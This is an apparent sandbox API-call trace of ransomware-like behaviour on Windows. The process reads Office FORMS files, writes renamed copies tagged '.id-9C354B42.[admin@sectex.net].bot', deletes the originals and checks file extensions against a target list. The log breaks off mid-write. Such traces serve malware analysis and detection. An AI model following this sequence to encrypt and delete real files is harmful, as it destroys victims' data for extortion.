	[0164.577] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0164.577] SetEndOfFile (hFile=0x25c) returned 1
	[0164.578] CloseHandle (hObject=0x25c) returned 1
	[0164.578] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.578] SetEndOfFile (hFile=0x3b8) returned 1
	[0164.580] CloseHandle (hObject=0x3b8) returned 1
	[0164.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico")) returned 1
	[0164.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.581] lstrlenW (lpString=".doc") returned 4
	[0164.581] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.581] lstrlenW (lpString=".docx") returned 5
	[0164.581] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0164.581] lstrlenW (lpString=".pdf") returned 4
	[0164.581] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.581] lstrlenW (lpString=".xls") returned 4
	[0164.581] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.581] lstrlenW (lpString=".xlsx") returned 5
	[0164.581] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0164.581] lstrlenW (lpString=".ppt") returned 4
	[0164.581] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.581] lstrlenW (lpString=".zip") returned 4
	[0164.581] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.581] lstrlenW (lpString=".rar") returned 4
	[0164.581] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.581] lstrlenW (lpString=".bz2") returned 4
	[0164.581] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.581] lstrlenW (lpString=".7z") returned 3
	[0164.581] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.581] lstrlenW (lpString=".dbf") returned 4
	[0164.581] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString=".1cd") returned 4
	[0164.582] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString=".jpg") returned 4
	[0164.582] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString=".doc") returned 4
	[0164.582] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0164.582] lstrlenW (lpString=".docx") returned 5
	[0164.582] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0164.582] lstrlenW (lpString=".pdf") returned 4
	[0164.582] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0164.582] lstrlenW (lpString=".xls") returned 4
	[0164.582] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0164.582] lstrlenW (lpString=".xlsx") returned 5
	[0164.582] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0164.582] lstrlenW (lpString=".ppt") returned 4
	[0164.582] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString=".zip") returned 4
	[0164.582] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0164.582] lstrlenW (lpString=".rar") returned 4
	[0164.582] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0164.582] lstrlenW (lpString=".bz2") returned 4
	[0164.582] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0164.582] lstrlenW (lpString=".7z") returned 3
	[0164.582] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString=".dbf") returned 4
	[0164.582] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0164.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.582] lstrlenW (lpString=".1cd") returned 4
	[0164.583] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0164.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO") returned 63
	[0164.583] lstrlenW (lpString=".jpg") returned 4
	[0164.583] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0164.583] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.583] lstrlenW (lpString="SMSS.ICO") returned 8
	[0164.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0164.583] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2238) returned 1
	[0164.583] CloseHandle (hObject=0x3b8) returned 1
	[0164.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico")) returned 0x20
	[0164.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0164.584] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.584] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0165.569] GetLastError () returned 0x0
	[0165.569] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x8be, lpOverlapped=0x0) returned 1
	[0165.859] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x8c0, lpOverlapped=0x0) returned 1
	[0165.860] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0165.860] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0165.860] SetEndOfFile (hFile=0x3ac) returned 1
	[0165.860] CloseHandle (hObject=0x3ac) returned 1
	[0165.860] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.860] SetEndOfFile (hFile=0x3b8) returned 1
	[0165.862] CloseHandle (hObject=0x3b8) returned 1
	[0165.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0165.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico")) returned 1
	[0165.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString=".doc") returned 4
	[0165.903] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0165.903] lstrlenW (lpString=".docx") returned 5
	[0165.903] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0165.903] lstrlenW (lpString=".pdf") returned 4
	[0165.903] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0165.903] lstrlenW (lpString=".xls") returned 4
	[0165.903] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0165.903] lstrlenW (lpString=".xlsx") returned 5
	[0165.903] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0165.903] lstrlenW (lpString=".ppt") returned 4
	[0165.903] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString=".zip") returned 4
	[0165.903] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0165.903] lstrlenW (lpString=".rar") returned 4
	[0165.903] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0165.903] lstrlenW (lpString=".bz2") returned 4
	[0165.903] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0165.903] lstrlenW (lpString=".7z") returned 3
	[0165.903] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString=".dbf") returned 4
	[0165.903] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString=".1cd") returned 4
	[0165.903] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString=".jpg") returned 4
	[0165.903] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.904] lstrlenW (lpString=".doc") returned 4
	[0165.904] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0165.904] lstrlenW (lpString=".docx") returned 5
	[0165.904] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0165.904] lstrlenW (lpString=".pdf") returned 4
	[0165.904] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0165.904] lstrlenW (lpString=".xls") returned 4
	[0165.904] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0165.904] lstrlenW (lpString=".xlsx") returned 5
	[0165.904] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0165.904] lstrlenW (lpString=".ppt") returned 4
	[0165.904] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0165.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.904] lstrlenW (lpString=".zip") returned 4
	[0165.904] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0165.904] lstrlenW (lpString=".rar") returned 4
	[0165.904] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0165.904] lstrlenW (lpString=".bz2") returned 4
	[0165.904] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0165.904] lstrlenW (lpString=".7z") returned 3
	[0165.904] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0165.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.904] lstrlenW (lpString=".dbf") returned 4
	[0165.904] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0165.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.904] lstrlenW (lpString=".1cd") returned 4
	[0165.904] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0165.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO") returned 62
	[0165.904] lstrlenW (lpString=".jpg") returned 4
	[0165.904] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0165.904] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0165.905] lstrlenW (lpString="TASKACC.CFG") returned 11
	[0165.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0165.914] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=804) returned 1
	[0165.914] CloseHandle (hObject=0x3b8) returned 1
	[0165.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg")) returned 0x20
	[0165.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0165.917] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.917] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0168.578] GetLastError () returned 0x0
	[0168.578] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x324, lpOverlapped=0x0) returned 1
	[0168.608] WriteFile (in: hFile=0x398, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x330, lpOverlapped=0x0) returned 1
	[0168.608] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.608] WriteFile (in: hFile=0x398, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0168.608] SetEndOfFile (hFile=0x398) returned 1
	[0168.609] CloseHandle (hObject=0x398) returned 1
	[0168.609] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.609] SetEndOfFile (hFile=0x3b8) returned 1
	[0168.611] CloseHandle (hObject=0x3b8) returned 1
	[0168.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg")) returned 1
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.612] lstrlenW (lpString=".doc") returned 4
	[0168.612] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString=".docx") returned 5
	[0168.612] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0168.612] lstrlenW (lpString=".pdf") returned 4
	[0168.612] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString=".xls") returned 4
	[0168.612] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString=".xlsx") returned 5
	[0168.612] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0168.612] lstrlenW (lpString=".ppt") returned 4
	[0168.612] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.612] lstrlenW (lpString=".zip") returned 4
	[0168.612] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString=".rar") returned 4
	[0168.612] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString=".bz2") returned 4
	[0168.612] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.612] lstrlenW (lpString=".7z") returned 3
	[0168.612] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.612] lstrlenW (lpString=".dbf") returned 4
	[0168.612] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.612] lstrlenW (lpString=".1cd") returned 4
	[0168.612] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.612] lstrlenW (lpString=".jpg") returned 4
	[0168.612] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.613] lstrlenW (lpString=".doc") returned 4
	[0168.613] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString=".docx") returned 5
	[0168.613] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0168.613] lstrlenW (lpString=".pdf") returned 4
	[0168.613] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString=".xls") returned 4
	[0168.613] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString=".xlsx") returned 5
	[0168.613] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0168.613] lstrlenW (lpString=".ppt") returned 4
	[0168.613] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.613] lstrlenW (lpString=".zip") returned 4
	[0168.613] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString=".rar") returned 4
	[0168.613] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString=".bz2") returned 4
	[0168.613] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.613] lstrlenW (lpString=".7z") returned 3
	[0168.613] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.613] lstrlenW (lpString=".dbf") returned 4
	[0168.613] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.613] lstrlenW (lpString=".1cd") returned 4
	[0168.613] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG") returned 65
	[0168.613] lstrlenW (lpString=".jpg") returned 4
	[0168.613] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.614] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.614] lstrlenW (lpString="TASKDECL.ICO") returned 12
	[0168.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.624] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1078) returned 1
	[0168.624] CloseHandle (hObject=0x1b4) returned 1
	[0168.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico")) returned 0x20
	[0168.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.630] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.630] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0168.630] GetLastError () returned 0x0
	[0168.630] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x436, lpOverlapped=0x0) returned 1
	[0168.632] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0168.633] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.633] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.633] SetEndOfFile (hFile=0x25c) returned 1
